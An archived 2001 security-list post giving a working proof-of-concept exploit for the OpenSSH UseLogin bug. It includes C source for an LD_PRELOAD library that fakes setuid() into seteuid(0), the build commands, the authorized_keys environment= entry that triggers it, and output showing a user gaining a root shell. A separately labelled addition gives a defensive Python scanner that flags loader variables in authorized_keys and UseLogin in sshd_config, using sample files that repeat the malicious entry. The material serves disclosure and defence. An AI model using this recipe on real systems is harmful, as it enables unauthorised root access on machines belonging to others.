OpenSSH UseLogin proof of concept exploit

From: [WaR] (warat_private)
Date: Wed Dec 05 2001 - 16:34:34 PST

    --[ OpenSSH UseLogin bug proof of concept exploit ]--
      by [WaR] <warat_private> / http://www.genhex.org
    
    
    --[ Intro ]--
    
     I was very curious to find out how to exploit this problem. Although
     I don't think anyone uses this feature, I looked into the matter anyway.
     Here it goes. It was tested on the following platforms:
      - Slackware 7.1 with OpenSSH3.0p1
      - RedHat 7.1 with OpenSSH_2.9p2
      - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
      - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
     The exploit should work as long as UseLogin does. YMMV.
    
     This is based on libroot from squidgeat_private,
     published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
     you thought it wouldn't happen again...).
    
     Kudos to pmsacat_private for his help figuring out the problem with
     the Slackware UseLogin, testing on OpenBSD, and giving the idea for
     the seteuid(0) (it originally was a system("/bin/sh");).
    
    --[ Code ]--
    
     Create a lib.c file with the following content:
    
     ---8<---
     #include <stdio.h>
     #include <unistd.h>   /* prototype for seteuid() */
     /* Replaces libc's setuid() for any process that loads this library. */
     int setuid(int uid){
       printf("setuid() called...\n");
       seteuid(0);
       return 0;
     }
     ---8<---
    
     Compile it into a library:
     gcc -c -o lib.o lib.c
     ld -shared -o libroot.so lib.o
     chmod 755 ./libroot.so
    
    
     Now, for the tricky (*g*) part...
    
     You must have an account on the machine, and create an entry
     in $HOME/.ssh/authorized_keys (or authorized_keys2) with:
    
     environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
    
     When sshd receives your connection, it will export this variable
     into the environment *BEFORE* running login. Somewhere after this,
     it executes a setuid. When it does, it makes a seteuid(0).
    
     $ id
     uid=1000(war) gid=100(users) groups=100(users)
     $ ssh war@localhost
     Enter passphrase for key '/home/war/.ssh/id_dsa':
     sh-2.04# id
     uid=0(root) gid=100(users) groups=100(users)
    
    
     It also works remotely. Anyway, you _MUST_ have an account on
     the victim machine so you can set up the environment, and log in.
     And obviously (duh) it must have UseLogin enabled.
    
     That's all.
    
    
     shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.
    
    
    
    -- [WaR]
    "if you can't hack it, hit it with a hammer"
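Added here as a defender's example, not part of [WaR]'s post: a small Python checker that parses authorized_keys option fields the way sshd does (comma-separated, with double-quoted values that may contain commas and spaces), lists every environment= option, and flags loader variables such as LD_PRELOAD, then reads an sshd_config fragment for UseLogin. The sample key file and config are constructed, with fake key material. PermitUserEnvironment is a later OpenSSH directive and is assumed here; sshd releases from the era of this post honoured environment= options unconditionally, so on those the authorized_keys scan is the only check that applies.

```python
"""Flag environment= options in authorized_keys and UseLogin in sshd_config.

Added example, not code from the post. All sample data below is constructed.
"""

# First tokens that mark a key line with no options field in front of it.
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")
# Variables that change how the dynamic loader treats the programs sshd execs.
DANGEROUS_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}


def split_outside_quotes(s, separators):
    """Split s on separator chars that are not inside double quotes.

    Quotes are kept in the pieces; a backslash inside quotes escapes the next char.
    """
    parts, cur, in_quote, i = [], [], False, 0
    while i < len(s):
        c = s[i]
        if c == "\\" and in_quote and i + 1 < len(s):
            cur.append(s[i + 1])
            i += 2
            continue
        if c == '"':
            in_quote = not in_quote
        elif c in separators and not in_quote:
            parts.append("".join(cur))
            cur = []
            i += 1
            continue
        cur.append(c)
        i += 1
    parts.append("".join(cur))
    return [p for p in parts if p]


def parse_authorized_line(line):
    """Return {'options': [...], 'key': '...'} for a key line, None for blank/comment."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = split_outside_quotes(line, " \t")
    # A leading key type (or a protocol-1 bit count) means there is no options field.
    if fields[0].startswith(KEY_TYPE_PREFIXES) or fields[0].isdigit():
        return {"options": [], "key": " ".join(fields)}
    return {"options": split_outside_quotes(fields[0], ","),
            "key": " ".join(fields[1:])}


def find_env_options(text):
    """List every environment=VAR=value option, marking loader variables as dangerous."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = parse_authorized_line(raw)
        if entry is None:
            continue
        for opt in entry["options"]:
            name, _, value = opt.partition("=")
            if name.strip().lower() != "environment":
                continue
            var, _, val = value.strip().strip('"').partition("=")
            findings.append({"line": lineno, "var": var, "value": val,
                             "dangerous": var in DANGEROUS_VARS})
    return findings


def sshd_config_flags(config):
    """Return (UseLogin, PermitUserEnvironment) as booleans; both default to no."""
    use_login = permit_env = False
    for raw in config.splitlines():
        parts = raw.split("#", 1)[0].strip().split(None, 1)
        if len(parts) != 2:
            continue
        key, val = parts[0].lower(), parts[1].strip().lower()
        if key == "uselogin":
            use_login = val == "yes"
        elif key == "permituserenvironment":
            permit_env = val == "yes"
    return use_login, permit_env


# Constructed sample files; the key blobs are placeholders, not real keys.
SAMPLE_AUTHORIZED_KEYS = """\
# constructed sample authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCplaceholder= admin@example
environment="LD_PRELOAD=/home/war/libroot.so" ssh-dss AAAAB3NzaC1kc3MAAACBplaceholder= war@localhost
from="10.0.0.1",environment="PATH=/usr/bin",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDplaceholder= ops@example
command="echo hello, world",no-port-forwarding ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDplaceholder= backup@example
"""

SAMPLE_SSHD_CONFIG = """\
# constructed sshd_config fragment
Port 22
UseLogin yes
#PermitUserEnvironment no
"""

if __name__ == "__main__":
    use_login, permit_env = sshd_config_flags(SAMPLE_SSHD_CONFIG)
    print(f"UseLogin={use_login} PermitUserEnvironment={permit_env}")
    for f in find_env_options(SAMPLE_AUTHORIZED_KEYS):
        tag = "DANGEROUS" if f["dangerous"] else "info"
        print(f"{tag}: line {f['line']} sets {f['var']}={f['value']}")
```

Run it against the real files with `find_env_options(open(path).read())` for each user's authorized_keys and authorized_keys2; any LD_* hit on a host with UseLogin yes is the exact condition the post describes, and the fix on the server side is to leave UseLogin off (and, where the directive exists, PermitUserEnvironment off) rather than to police key files.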
    



    This archive was generated by hypermail 2b30 : Wed Dec 05 2001 - 17:02:39 PST